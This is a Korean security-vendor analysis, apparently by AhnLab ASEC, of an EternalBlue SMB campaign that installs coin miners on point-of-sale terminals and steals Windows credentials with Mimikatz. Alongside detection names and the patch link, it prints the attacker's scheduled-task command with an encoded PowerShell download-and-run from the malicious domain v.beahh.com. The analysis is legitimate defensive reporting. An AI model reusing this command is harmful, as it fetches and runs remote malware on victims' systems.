안랩 ASEC은 지난 2월 11일 EternalBlue SMB 취약점으로 국내 POS 장비에 코인 마이너를 전파하는 공격을 확인하였다. 작년 6월에도 같은 이터널 블루 취약점으로 POS 장비의 인터넷이 마비되는 사건(https://asec.ahnlab.com/1143)이 있었으며 재작년 ‘WannaCrypt’ 이부터 현재까지도 공격자들은 SMB 취약점 공격을 악성코드를 전파하는 데 사용하고 있다. 추가로 이번 공격에 사용된 악성코드는 1월 28일 중국 Tencent 업체에서 언급된 것과 동일한 기능을 갖는 것으로 확인되었다. (https://guanjia.qq.com/news/n3/2475.html)


해당 취약점 공격은 윈도우 보안 패치로 방어할 수 있으므로 POS 장비뿐만 아니라 아직 MS 패치를 적용하지 않은 시스템은 감염 피해를 예방하기 위해 업데이트가 시급하다. 이번 국내 POS 장비 공격 과정은 [그림 1]과 같다.



[그림 1] 국내 POS 장비 공격 흐름도


공격 과정 중 EternalBlue SMB 취약점 공격을 발생시키는 주체인 "svchost.exe" 파일의 주요 기능은 아래와 같다.


[네트워크 행위]

- 로컬 시스템의 60124번 포트 바인딩

- 445번 포트 방화벽 설정

- 파워쉘 명령어를 통해 특정 도메인(v.beahh.com)에서 스크립트를 다운로드

- ipconfig /all, netstat –na 명령을 확인되는 모든 ip 대역을 스캔

- http://ip.42.pl/raw, http://jsonip.com 사이트에서 확인되는 ip 대역을 스캔

- SMB 취약점이 확인된 PC에 아래 파워쉘 명령어 실행 -> http://v.beahh.com/v 사이트 접속 후 스크립트 다운로드 명령


cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr 

 "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcA

ZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAO

gAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="

/F&&c:\\windows\\temp\\svchost.exe

 

[시스템 행위]

- 파워쉘 명령어를 통해 윈도우 계정 패스워드 확인 툴인 MIMIKATZ 실행 (m.ps1)

- MIMIKATZ 툴을 통해서 얻은 계정 정보와 사용자 도메인 정보를 c:\windows\temp\mkatz.ini에 저장

- 파워쉘이 없는 시스템 환경(xp)일 경우 http://w.beahh.com/page.html에 접속하여 스크립트를 다운로드 및 실행


[파일 진단]

현재 안랩 제품에서는 해당 악성코드들을 다음과 같이 진단하고 있다.


파일명

진단명

svchost.exe (SMB 전파)

Trojan/Win32.Trickster.R254998

svchost.exe (sample.exe)

Malware/Win32.Generic.C2950422

wmiex.exe (MAL 1)

Trojan/Win32.Agent.R254993

taskmgr.exe (MAL 2 32bit Binary)

Malware/Win32.Nsanti.C2957178

taskmgr.exe (MAL 2 64bit Binary)

Trojan/Win64.Agent.C3009705

m.ps1 (윈도우 계정탈취)

SCRIPT/Powershell

 


[URL 차단]

 

[SMB 취약점 패치]

- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

Posted by 분석팀